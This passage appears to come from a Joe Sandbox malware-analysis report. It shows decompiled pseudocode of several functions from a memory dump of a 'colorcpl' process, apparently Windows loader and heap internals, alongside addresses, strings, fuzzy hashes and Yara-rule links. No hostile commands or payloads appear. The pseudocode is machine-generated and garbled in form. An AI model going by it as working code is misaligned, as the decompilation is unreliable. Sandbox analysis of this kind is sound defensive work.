								_push( *((intOrPtr*)(_t98 + 4)));
								E04382A80();
								E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t98);
							}
						}
						E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t87);
						goto L13;
					}
					_push( &_v44);
					_push(0);
					_push( &_v68);
					_t90 = 2;
					_t101 = E04361C48(__ecx, __ecx);
					if(_t101 < 0) {
						goto L22;
					} else {
						_t84 = _v44;
						_t87 = _v64;
						if(_t84 != 0) {
							_v68 = _t84;
							_v64 = _v40;
						}
						goto L8;
					}
				}
			}

0x043cf42f
0x043cf43a
0x043cf443
0x043cf445
0x043cf44c
0x043cf607
0x00000000
0x043cf463
0x043cf467
0x043cf4a9
0x043cf4ae
0x043cf4ae
0x043cf4b7
0x043cf4bc
0x043cf4c1
0x043cf4c6
0x043cf4ce
0x043cf4d0
0x043cf4d5
0x043cf4dd
0x043cf4de
0x043cf4e7
0x043cf4ef
0x043cf4f0
0x043cf4f5
0x043cf4f9
0x043cf536
0x043cf538
0x043cf554
0x043cf558
0x043cf56d
0x043cf578
0x043cf579
0x043cf57a
0x043cf57c
0x043cf57e
0x043cf57f
0x043cf584
0x043cf585
0x043cf586
0x043cf587
0x043cf588
0x043cf591
0x043cf595
0x043cf597
0x043cf59f
0x043cf5b5
0x043cf5b9
0x043cf5c5
0x043cf5ca
0x043cf5d9
0x043cf5e0
0x043cf5bb
0x043cf5bb
0x043cf5bb
0x043cf5b9
0x043cf59f
0x043cf5ee
0x043cf55a
0x043cf55a
0x043cf55a
0x043cf558
0x043cf5f3
0x043cf5f8
0x043cf5fa
0x043cf5fe
0x043cf5fe
0x043cf603
0x043cf60c
0x043cf612
0x043cf612
0x043cf4fb
0x043cf501
0x043cf506
0x043cf50a
0x043cf50c
0x043cf50f
0x043cf520
0x043cf520
0x043cf50a
0x043cf531
0x00000000
0x043cf531
0x043cf46f
0x043cf470
0x043cf475
0x043cf478
0x043cf47e
0x043cf482
0x00000000
0x043cf488
0x043cf488
0x043cf48c
0x043cf493
0x043cf495
0x043cf49d
0x043cf49d
0x00000000
0x043cf493
0x043cf482

Strings

@, xrefs: 043CF4E7

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
Instruction ID: bc266625a217f2844956218159d4aff720a16acb6babace9eb18ceffb8cbd20f
Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
Instruction Fuzzy Hash: 3E5197B2604706AFE7219F14C840F6BB7E9FF84718F10192DBA41972A0EBB4FD048B95

Uniqueness

Uniqueness Score: -1.00%

Function 0435E547 Relevance: 1.4, Strings: 1, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0435E547(unsigned int __ecx, void* __edx, void* __eflags) {
				char _v24;
				char _v32;
				unsigned int _v36;
				short _v38;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				signed short _v50;
				unsigned int _v52;
				char _v56;
				char _v57;
				intOrPtr _v60;
				char _v61;
				char _v73;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t47;
				intOrPtr _t51;
				void* _t55;
				char _t60;
				void* _t68;
				void* _t78;
				unsigned int _t81;
				unsigned int _t82;
				void* _t94;
				void* _t95;
				void* _t97;
				unsigned int _t99;
				short _t100;
				signed int _t101;
				void* _t103;

				_t82 = __ecx;
				_t103 = (_t101 & 0xfffffff8) - 0x2c;
				_v44 = _v44 & 0x00000000;
				_push(_t78);
				_push(_t97);
				_push(_t94);
				_push( &_v44);
				_push(0);
				_push(0x4311050);
				E0435F2F0(_t78, _t94, _t97, __eflags);
				_t95 = E0434DE20(_t82, __eflags, _v56, 1, 0xd,  &_v52);
				if(_t95 == 0) {
					_t47 = 0;
					L15:
					return _t47;
				}
				_t99 = 0;
				_t81 = _v52 >> 5;
				_v44 =  *( *[fs:0x30] + 0x38);
				_v40 = 0;
				_v36 = 0;
				_v52 = 0;
				if(_t81 == 0) {
					L14:
					_t47 = _t99;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t51 =  *((intOrPtr*)(_t95 + 4));
					if(_t51 == 0) {
						break;
					}
					_push(4);
					_v48 = _t51 + _v56;
					_t55 = E043874B0(_t51 + _v56, "EXT-");
					_t103 = _t103 + 0xc;
					_t108 = _t55;
					if(_t55 != 0) {
						L11:
						_t95 = _t95 + 0x20;
						_t82 = _v52 + 1;
						_v52 = _t82;
						if(_t82 < _t81) {
							continue;
						}
						break;
					}
					E04385010(_t82,  &_v32, _v48);
					_t100 = E0433ADA0(_t82, _t108,  &_v40);
					if(_t100 > (_v50 & 0x0000ffff)) {
						__eflags = _t100 - 0xfffe;
						if(_t100 >= 0xfffe) {
							_t99 = 0xc0000095;
							break;
						}
						__eflags = _v36;
						if(_v36 != 0) {
							E04353B90( &_v40);
						}
						_t60 = E04355D60(_t100);
						_v40 = _t60;
						__eflags = _t60;
						if(_t60 == 0) {
							_t99 = 0xc000009a;
							break;
						} else {
							_v38 = _t100;
							L6:
							E0435C560( &_v40,  &_v32, 0);
							E0435DF36(0,  &_v52, 0x14d0);
							_t99 = E0436015C(_v60,  &_v56, 0,  &_v73,  &_v40);
							if(_t99 < 0 || _v57 == 0) {
								_t68 = 0x14d3;
							} else {
								_t68 = (0 | _v24 == 0x00000000) + 0x14d1;
							}
							E0435DF36(0,  &_v40, _t68);
							if(_v61 != 0 && E043604C0(0x4311174,  &_v24, 1) == 0) {
								_t99 = E0435E4F8(_v56, _t95);
								__eflags = _t99;
								if(_t99 < 0) {
									break;
								}
								_t99 = 0;
							}
							goto L11;
						}
					}
					_v40 = 0;
					goto L6;
				}
				if(_v36 != 0) {
					E04353B90( &_v40);
				}
				goto L14;
			}

0x0435e547
0x0435e54f
0x0435e552
0x0435e55b
0x0435e55c
0x0435e55d
0x0435e55e
0x0435e55f
0x0435e561
0x0435e566
0x0435e57d
0x0435e581
0x0435e706
0x0435e6b9
0x0435e6bf
0x0435e6bf
0x0435e58d
0x0435e593
0x0435e599
0x0435e59f
0x0435e5a3
0x0435e5a7
0x0435e5ad
0x0435e6b7
0x0435e6b7
0x00000000
0x00000000
0x00000000
0x00000000
0x0435e5b3
0x0435e5b3
0x0435e5b3
0x0435e5b8
0x00000000
0x00000000
0x0435e5c2
0x0435e5ca
0x0435e5ce
0x0435e5d3
0x0435e5d6
0x0435e5d8
0x0435e692
0x0435e696
0x0435e699
0x0435e69a
0x0435e6a0
0x00000000
0x00000000
0x00000000
0x0435e6a0
0x0435e5e7
0x0435e5fb
0x0435e5ff
0x0435e6d5
0x0435e6db
0x0435e711
0x00000000
0x0435e711
0x0435e6dd
0x0435e6e2
0x0435e6e9
0x0435e6e9
0x0435e6ef
0x0435e6f4
0x0435e6f8
0x0435e6fa
0x0435e70a
0x00000000
0x0435e6fc
0x0435e6fc
0x0435e60c
0x0435e618
0x0435e628
0x0435e646
0x0435e64a
0x043a986f
0x0435e65b
0x0435e665
0x0435e665
0x0435e671
0x0435e67b
0x0435e6cb
0x0435e6cd
0x0435e6cf
0x00000000
0x00000000
0x0435e6d1
0x0435e6d1
0x00000000
0x0435e67b
0x0435e6fa
0x0435e607
0x00000000
0x0435e607
0x0435e6ab
0x0435e6b2
0x0435e6b2
0x00000000

Strings

EXT-, xrefs: 0435E5C4

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 017248ab131512a0be1c3ce0ae29c2545cd8b130baaa0d31ac0901072654af71
Instruction ID: 0fb299919dcd4a044490454111ad93727e5949caca795ee96977ede49ae75f78
Opcode Fuzzy Hash: 017248ab131512a0be1c3ce0ae29c2545cd8b130baaa0d31ac0901072654af71
Instruction Fuzzy Hash: 8441A2726143119BE720DF65C845F6BB3ECAF88748F04292DF984E71A0E674EA048797

Uniqueness

Uniqueness Score: -1.00%

Function 043741BB Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E043741BB(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = L043558B0(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04382CE0();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04382E40();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04382A80();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0x711f281a
							_t109 = E04355D90(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2002711f
								E043888C0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2002711f
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04382A80();
										E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x043741cf
0x043741d5
0x043741dc
0x043741e3
0x043741ee
0x043741f0
0x043741f4
0x043741fc
0x04374204
0x04374209
0x04374211
0x04374212
0x0437421b
0x0437421f
0x04374220
0x04374228
0x0437422c
0x04374230
0x04374239
0x04374240
0x04374247
0x0437424e
0x043b2e52
0x043b2e52
0x04374254
0x04374254
0x04374256
0x0437425c
0x04374261
0x04374262
0x0437426b
0x0437426f
0x043b2e49
0x043b2e49
0x043b2e4d
0x00000000
0x04374275
0x04374275
0x04374289
0x0437428d
0x043b2e44
0x00000000
0x04374293
0x04374297
0x0437429e
0x043742a5
0x043742ab
0x043742ae
0x043742b2
0x043742b5
0x043742bc
0x043742c0
0x043742d4
0x043742db
0x043742df
0x043742e2
0x043742e7
0x043742ea
0x043742f0
0x0437430b
0x043b2e59
0x043b2e5d
0x043b2e6e
0x043b2e73
0x04374311
0x04374314
0x04374322
0x04374327
0x00000000
0x04374327
0x043742f2
0x043742f2
0x043742f5
0x043742f7
0x043742f7
0x043742f0
0x0437428d
0x0437426f
0x0437424e
0x043742ff

Strings

@, xrefs: 04374220

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction ID: cf8b9d6275d5f4e5cb5182a0305bd307aa18fe27d91560764f09b2b5b0fe95cd
Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
Instruction Fuzzy Hash: 78516A71604711AFD320DF59C841A6BB7F8FF48714F008A2EFA95976A0E774E914CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0433B0D6 Relevance: 1.4, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0433B0D6(void* __ebx, intOrPtr __ecx, signed int __edx, void* __esi, signed int _a4) {
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				void* __edi;
				void* __ebp;
				intOrPtr _t28;
				signed int _t33;
				void* _t34;
				signed int _t37;
				signed int _t43;
				signed int _t46;
				void* _t51;
				signed int _t64;
				void* _t65;
				signed int* _t66;

				_t65 = __esi;
				_t63 = __edx;
				_t51 = __ebx;
				_t64 = __edx;
				_v16 = __ecx;
				if(E04371CA7(__ecx) < 0) {
					L17:
					return 0;
				}
				if(E0437D060(__ecx, 0x4314f1c,  &_v8) >= 0) {
					if(_v8 != 0) {
						goto L17;
					}
				}
				E0437C640(_t51, 0, _t63, _t64);
				if(E04360130() != 0) {
					_t28 =  *0x443921c; // 0x0
				} else {
					_t28 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				}
				_push(_t51);
				_push(_t65);
				_t52 = 0;
				_t66 = E04355D90(0, _t28, 0, 0x14);
				if(_t66 == 0) {
					L13:
					E0437C640(_t52, 1, _t63, _t64);
					return _t66;
				} else {
					_t66[3] = 0;
					_t33 = E04355D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 4);
					_t66[2] = _t33;
					if(_t33 == 0) {
						_t34 = E04360130();
						_push(_t66);
						_push(0);
						if(_t34 != 0) {
							_push( *0x443921c);
						} else {
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
						}
						E04353BC0();
						_t66 = _t52;
						goto L13;
					}
					 *_t33 = 1;
					_t37 =  *0x44365fc; // 0x4926397d
					if(_t37 == 0) {
						_push(0);
						_push(4);
						_push( &_v12);
						_push(0x24);
						_push(0xffffffff);
						if(E04382B20() < 0) {
							L04398AA0(0, _t63, _t39);
						}
						_t37 = _v12;
						 *0x44365fc = _t37;
					}
					_t60 = _t37 & 0x0000001f;
					asm("ror eax, cl");
					_t66[4] = _t37 ^ _t64;
					_t52 = 0x443933c + _a4 * 0xc;
					_t64 = 0x4439340 + _a4 * 0xc;
					L04352330(E04371D66(_t37 & 0x0000001f, _t63, 0),  *(0x443933c + _a4 * 0xc));
					if( *_t64 == _t64) {
						_t60 = _a4 + 2;
						asm("lock bts [eax], ecx");
					}
					if(_v16 == 0) {
						_t43 =  *(_t64 + 4);
						if( *_t43 != _t64) {
							goto L16;
						}
						 *_t66 = _t64;
						_t66[1] = _t43;
						 *_t43 = _t66;
						 *(_t64 + 4) = _t66;
						goto L12;
					} else {
						_t46 =  *_t64;
						if( *(_t46 + 4) != _t64) {
							L16:
							_push(3);
							asm("int 0x29");
							goto L17;
						}
						 *_t66 = _t46;
						_t66[1] = _t64;
						 *(_t46 + 4) = _t66;
						 *_t64 = _t66;
						L12:
						E043524D0( *_t52);
						E04371D66(_t60, _t63, 1);
						goto L13;
					}
				}
			}

0x0433b0d6
0x0433b0d6
0x0433b0d6
0x0433b0df
0x0433b0e1
0x0433b0eb
0x0433b1f4
0x00000000
0x0433b1f4
0x0433b101
0x0439cb86
0x00000000
0x00000000
0x0439cb8c
0x0433b109
0x0433b115
0x0433b1e5
0x0433b11b
0x0433b121
0x0433b121
0x0433b124
0x0433b125
0x0433b128
0x0433b131
0x0433b135
0x0433b1d4
0x0433b1d7
0x00000000
0x0433b13b
0x0433b144
0x0433b14a
0x0433b14f
0x0433b154
0x0439cb91
0x0439cb96
0x0439cb97
0x0439cb9a
0x0439cba7
0x0439cb9c
0x0439cba2
0x0439cba2
0x0439cbad
0x0439cbb2
0x00000000
0x0439cbb2
0x0433b15a
0x0433b160
0x0433b167
0x0439cbb9
0x0439cbba
0x0439cbbf
0x0439cbc0
0x0439cbc2
0x0439cbcb
0x0439cbce
0x0439cbce
0x0439cbd3
0x0439cbd6
0x0439cbd6
0x0433b175
0x0433b178
0x0433b17c
0x0433b17f
0x0433b185
0x0433b18f
0x0433b196
0x0433b1a1
0x0433b1a7
0x0433b1a7
0x0433b1af
0x0439cbe0
0x0439cbe5
0x00000000
0x00000000
0x0439cbeb
0x0439cbed
0x0439cbf0
0x0439cbf2
0x00000000
0x0433b1b5
0x0433b1b5
0x0433b1ba
0x0433b1ef
0x0433b1ef
0x0433b1f2
0x00000000
0x0433b1f2
0x0433b1bc
0x0433b1be
0x0433b1c1
0x0433b1c4
0x0433b1c6
0x0433b1c8
0x0433b1cf
0x00000000
0x0433b1cf
0x0433b1af

Strings

}9&I(, xrefs: 0433B160, 0439CBD6

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: }9&I(
API String ID: 0-1653408428
Opcode ID: c880c64d9b1b5e38d265339c47eb48829e74f664e7221e2ab8ce8af80454f720
Instruction ID: a73d652c51c16452e42d5249256d961d74e6dde6f15019b66480eae0b8f04f50
Opcode Fuzzy Hash: c880c64d9b1b5e38d265339c47eb48829e74f664e7221e2ab8ce8af80454f720
Instruction Fuzzy Hash: 6941A0B1A40601EFEB25EF64C840B66F7F8EF40759F00A469E5519B661E774FD00CB50

Uniqueness

Uniqueness Score: -1.00%

Function 043C9429 Relevance: 1.4, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E043C9429(void* __edx) {
				intOrPtr _v8;
				signed short* _v12;
				void* __ecx;
				void* _t16;
				signed int _t17;
				intOrPtr _t20;
				void** _t21;
				signed int _t22;
				void* _t24;
				void** _t30;
				signed int _t31;
				void* _t35;
				void* _t36;
				intOrPtr _t37;
				void* _t38;
				void* _t39;
				intOrPtr _t42;
				signed int _t45;
				void* _t47;
				void* _t53;
				void* _t54;
				signed short* _t55;
				signed int _t60;
				signed short* _t65;
				void* _t66;
				void* _t67;

				_push(_t39);
				_push(_t39);
				_v8 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t53 = E04355D90(_t39,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x24);
				if(_t53 == 0) {
					L21:
					_t16 = 0xc0000017;
				} else {
					_t17 = 9;
					memset(_t53, 0, _t17 << 2);
					_t67 = _t66 + 0xc;
					_t42 =  *0x4311b98; // 0x1a0018
					 *((intOrPtr*)(_t53 + 8)) = _t42;
					_t20 =  *0x4311b9c; // 0x4324444
					 *((intOrPtr*)(_t53 + 0xc)) = _t20;
					_t21 =  *0x4435244; // 0x0
					if( *_t21 != 0x4435240) {
						L20:
						_push(3);
						asm("int 0x29");
						goto L21;
					} else {
						 *_t53 = 0x4435240;
						_t65 = 0x4435000;
						 *(_t53 + 4) = _t21;
						 *_t21 = _t53;
						 *0x4435244 = _t53;
						if( *0x4435000 == 0) {
							L19:
							_t16 = 0;
						} else {
							_t54 = 0x20;
							do {
								_t35 = 9;
								while(1) {
									_t22 =  *_t65 & 0x0000ffff;
									_t45 = _t22;
									if(_t22 != _t54 && _t22 != _t35) {
										break;
									}
									_t65 =  &(_t65[1]);
								}
								_t55 = _t65;
								_v12 = _t55;
								if(_t22 == 0) {
									goto L19;
								} else {
									_t60 = 9;
									_t36 = 0x20;
									while(_t45 != _t36 && _t45 != _t60) {
										_t65 =  &(_t65[1]);
										_t31 =  *_t65 & 0x0000ffff;
										_t45 = _t31;
										if(_t31 != 0) {
											continue;
										}
										break;
									}
									_t37 = _v8;
									if(_t55 == _t65) {
										goto L19;
									} else {
										 *_t65 = 0;
										_t24 = E043879A0(_t55, L"verifier.dll");
										_pop(_t47);
										if(_t24 == 0) {
											goto L18;
										} else {
											_t38 = E04355D90(_t47, _t37, 0, 0x24);
											if(_t38 == 0) {
												goto L21;
											} else {
												memset(_t38, 0, _t60 << 2);
												_t67 = _t67 + 0xc;
												_t11 = _t38 + 8; // 0x8
												E04385050(_t11, _t11, _v12);
												_t30 =  *0x4435244; // 0x0
												if( *_t30 != 0x4435240) {
													goto L20;
												} else {
													 *_t38 = 0x4435240;
													 *(_t38 + 4) = _t30;
													 *_t30 = _t38;
													 *0x4435244 = _t38;
													goto L18;
												}
											}
										}
									}
								}
								goto L22;
								L18:
								_t65 =  &(_t65[1]);
								_t54 = 0x20;
							} while ( *_t65 != 0);
							goto L19;
						}
					}
				}
				L22:
				return _t16;
			}

0x043c942e
0x043c942f
0x043c9442
0x043c944a
0x043c944e
0x043c955d
0x043c955d
0x043c9454
0x043c9456
0x043c945d
0x043c945d
0x043c945f
0x043c9465
0x043c946d
0x043c9472
0x043c9475
0x043c947c
0x043c9558
0x043c9558
0x043c955b
0x00000000
0x043c9482
0x043c9482
0x043c9484
0x043c9489
0x043c948c
0x043c9496
0x043c949c
0x043c9554
0x043c9554
0x043c94a2
0x043c94a4
0x043c94a5
0x043c94a7
0x043c94a8
0x043c94a8
0x043c94ab
0x043c94b0
0x00000000
0x00000000
0x043c94b7
0x043c94b7
0x043c94bc
0x043c94be
0x043c94c4
0x00000000
0x043c94ca
0x043c94cc
0x043c94cf
0x043c94d0
0x043c94da
0x043c94dd
0x043c94e0
0x043c94e5
0x00000000
0x00000000
0x00000000
0x043c94e5
0x043c94e7
0x043c94ec
0x00000000
0x043c94ee
0x043c94f6
0x043c94f9
0x043c94ff
0x043c9502
0x00000000
0x043c9504
0x043c950e
0x043c9512
0x00000000
0x043c9514
0x043c951d
0x043c951d
0x043c951f
0x043c9523
0x043c9528
0x043c9534
0x00000000
0x043c9536
0x043c9536
0x043c9538
0x043c953b
0x043c953d
0x00000000
0x043c953d
0x043c9534
0x043c9512
0x043c9502
0x043c94ec
0x00000000
0x043c9543
0x043c9543
0x043c954a
0x043c954b
0x00000000
0x043c94a5
0x043c949c
0x043c947c
0x043c9562
0x043c9566

Strings

verifier.dll, xrefs: 043C94F0

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 3238dbacf4769f2b850fcf1d168a8610e7b4ff63eef0c6e100c30e012d50a787
Instruction ID: fcefe38c6449808b2e17c42bc3591c034260a4881a49bbd4b9760a0f19505934
Opcode Fuzzy Hash: 3238dbacf4769f2b850fcf1d168a8610e7b4ff63eef0c6e100c30e012d50a787
Instruction Fuzzy Hash: 5A31A5F2700201AFEB24DF189850B76B7E5EF48714F65946EE608DF381E635ED808B50

Uniqueness

Uniqueness Score: -1.00%

Function 04377425 Relevance: 1.4, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04377425(void* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				signed int _t72;
				void* _t75;
				intOrPtr _t76;
				void* _t77;
				signed int _t79;

				_v12 = _v12 & 0x00000000;
				_t77 = __edx;
				_t75 = __ecx;
				if(__edx == 0 || __ecx == 0) {
					L24:
					return 0xc000000d;
				} else {
					_t62 = _a4;
					if(_t62 == 0) {
						goto L24;
					}
					_v16 =  *_t62;
					_t64 = E04355D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xaa);
					_v20 = _t64;
					if(_t64 == 0) {
						return 0xc0000017;
					}
					_t45 =  *(_t77 + 6) & 0x0000ffff;
					if(( *(_t77 + 6) & 0x0000ffff) <= 0) {
						_v24 = _t64;
						_v28 = 0xaa0000;
						if(E04364F40( *(_t77 + 4) & 0x0000ffff,  &_v28) != 0) {
							L6:
							_t76 = _a8;
							_t66 = _a12;
							if( *_t62 <= 0 ||  *_t62 > _t66) {
								L8:
								_t72 = _v16;
								_t20 = _t72 + 1; // 0x1
								_t79 = _t20 + ((_v28 & 0x0000ffff) >> 1);
								if(_t76 != 0) {
									if(_t72 >= _t79) {
										goto L9;
									}
									if(_t79 >= _t66) {
										L10:
										if(_t76 != 0) {
											_v12 = 0xc0000023;
										}
										L11:
										 *_t62 = _t79;
										goto L12;
									}
									E043888C0(_t76 + _t72 * 2, _v24, _v28 & 0x0000ffff);
									 *((short*)(_t76 + _t79 * 2 - 2)) = 0;
									goto L11;
								}
								L9:
								if(_t79 < _t66) {
									goto L11;
								}
								goto L10;
							} else {
								if(E04362CEB(_v24,  *_t62) != 0) {
									L12:
									E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v20);
									return _v12;
								}
								_t66 = _a12;
								goto L8;
							}
						}
						_v12 = 0xc00000e5;
						goto L12;
					}
					E04385050( *( *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0xc)) + _t45 * 2),  &_v28,  *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0x10)) +  *( *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0xc)) + _t45 * 2) * 2);
					goto L6;
				}
			}

0x0437742d
0x04377433
0x04377436
0x0437743a
0x043b4439
0x00000000
0x04377448
0x04377448
0x0437744d
0x00000000
0x00000000
0x04377455
0x0437746e
0x04377470
0x04377475
0x00000000
0x043b4417
0x0437747b
0x04377482
0x043774f6
0x043774fe
0x0437750c
0x043774a1
0x043774a4
0x043774a7
0x043774aa
0x043774b4
0x043774b4
0x043774bd
0x043774c0
0x043774c4
0x04377515
0x00000000
0x00000000
0x04377519
0x043774ca
0x043774cc
0x043b442d
0x043b442d
0x043774d2
0x043774d2
0x00000000
0x043774d2
0x04377527
0x04377531
0x00000000
0x04377531
0x043774c6
0x043774c8
0x00000000
0x00000000
0x00000000
0x04377538
0x04377546
0x043774d4
0x043774e3
0x00000000
0x043774e8
0x04377548
0x00000000
0x04377548
0x043774aa
0x043b4421
0x00000000
0x043b4421
0x0437749c
0x00000000
0x0437749c

Strings

#, xrefs: 043B442D

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction ID: c218b50008debf847d07793662eee6b9c31e59564e73ed5a2b725abe9a4240c3
Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction Fuzzy Hash: 1641D071A0061AEBCF20DF88C480BBEBBB4FF40705F21545AE981AB640E738B951CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0437360F Relevance: 1.4, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 68%

